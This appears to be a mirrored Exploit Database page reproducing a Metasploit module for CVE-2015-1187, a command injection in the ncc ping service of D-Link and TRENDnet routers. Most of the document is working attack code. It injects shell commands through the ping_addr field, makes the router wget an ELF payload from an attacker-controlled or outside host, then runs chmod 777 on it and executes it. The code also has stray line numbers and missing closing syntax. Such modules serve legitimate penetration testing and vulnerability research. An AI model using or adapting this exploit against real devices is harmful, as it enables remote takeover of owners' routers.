D-Link/TRENDnet – NCC Service Command Injection (Metasploit)

Exploit Database
122 阅读

作者： Metasploit

日期： 2015-02-26
类别：
- webapps
平台：
- linux
来源：https://www.exploit-db.com/exploits/41677/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote

Rank = NormalRanking # Only tested on Emulated environment

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::Remote::HttpServer::HTML

include Msf::Exploit::EXE

include Msf::Exploit::FileDropper

def initialize(info = {})

super(update_info(info,

'Name' => 'D-Link/TRENDnet NCC Service Command Injection',

'Description'=> %q{

This module exploits a remote command injection vulnerability on several routers. The

vulnerability exists in the ncc service, while handling ping commands. This module has

been tested on a DIR-626L emulated environment. Several D-Link and TRENDnet devices

are reported as affected, including: D-Link DIR-626L (Rev A) v1.04b04, D-Link DIR-636L

(Rev A) v1.04, D-Link DIR-808L (Rev A) v1.03b05, D-Link DIR-810L (Rev A) v1.01b04, D-Link

DIR-810L (Rev B) v2.02b01, D-Link DIR-820L (Rev A) v1.02B10, D-Link DIR-820L (Rev A)

v1.05B03, D-Link DIR-820L (Rev B) v2.01b02, D-Link DIR-826L (Rev A) v1.00b23, D-Link

DIR-830L (Rev A) v1.00b07, D-Link DIR-836L (Rev A) v1.01b03 and TRENDnet TEW-731BR (Rev 2)

v2.01b01

'Author' =>

[

'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # Vulnerability discovery and initial PoC

'Tiago Caetano Henriques', # Vulnerability discovery and initial PoC

'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module

'License'=> MSF_LICENSE,

'References' =>

[

['CVE', '2015-1187'],

['BID', '72816'],

['URL', 'https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2'],

['URL', 'http://seclists.org/fulldisclosure/2015/Mar/15'],

['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10052']

'Targets'=>

# Only tested on D-Link DIR-626L where wget is available

[

[ 'Linux mipsel Payload',

{

'Arch' => ARCH_MIPSLE,

'Platform' => 'linux'

}

[ 'Linux mipsbe Payload',

{

'Arch' => ARCH_MIPSBE,

'Platform' => 'linux'

}

'DisclosureDate'=> 'Feb 26 2015',

'DefaultTarget' => 0))

register_options(

[

OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]),

OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]),

OptString.new('TARGETURI', [true, 'The base path to the vulnerable application area', '/ping.ccp']),

OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 10])

], self.class)

end

def check

begin

res = send_request_cgi({

'method' => 'GET',

'uri'=> normalize_uri(target_uri.path)

})

# unknown if other devices also using mini_httpd

if res && [500].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/

return Exploit::CheckCode::Detected

end

rescue ::Rex::ConnectionError

return Exploit::CheckCode::Unknown

end

Exploit::CheckCode::Unknown

end

def exec_command(cmd, timeout = 20)

begin

res = send_request_cgi({

'method' => 'POST',

'uri'=> normalize_uri(target_uri.path),

'encode_params' => false,

'vars_post' => {

'ccp_act' => 'ping_v6',

'ping_addr' => '$(' + cmd + ')'

}

}, timeout)

return res

rescue ::Rex::ConnectionError

fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")

end

def primer

@payload_url = get_uri

wget_payload

end

def exploit

print_status("Accessing the vulnerable URL...")

unless check == Exploit::CheckCode::Detected

fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL")

end

print_status("Exploiting...")

@pl = generate_payload_exe

@payload_url= ''

@dropped_elf = rand_text_alpha(rand(5) + 3)

if datastore['EXTURL'].blank?

begin

Timeout.timeout(datastore['HTTPDELAY']) { super }

rescue Timeout::Error

end

chmod_payload

exec_payload

else

@payload_url = datastore['EXTURL']

wget_payload

chmod_payload

exec_payload

end

def wget_payload

upload_path = File.join(datastore['WRITABLEDIR'], @dropped_elf)

cmd = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{upload_path}"

print_status("Downloading the payload to the target machine...")

res = exec_command(cmd)

if res && [200].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/

register_files_for_cleanup(upload_path)

else

fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target")

end

def chmod_payload

cmd = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"

print_status("chmod the payload...")

res = exec_command(cmd, 1)

unless res

fail_with(Failure::Unknown, "#{peer} - Unable to chmod payload")

end

Rex.sleep(1)

end

def exec_payload

cmd = File.join(datastore['WRITABLEDIR'], @dropped_elf)

print_status("Executing the payload...")

res = exec_command(cmd, 1)

unless res

fail_with(Failure::Unknown, "#{peer} - Unable to exec payload")

end

Rex.sleep(1)

end

# Handle incoming requests to the HTTP server

def on_request_uri(cli, request)

print_status("Request: #{request.uri}")

if request.uri =~ /#{Regexp.escape(get_resource)}/

print_status('Sending payload...')

send_response(cli, @pl)

end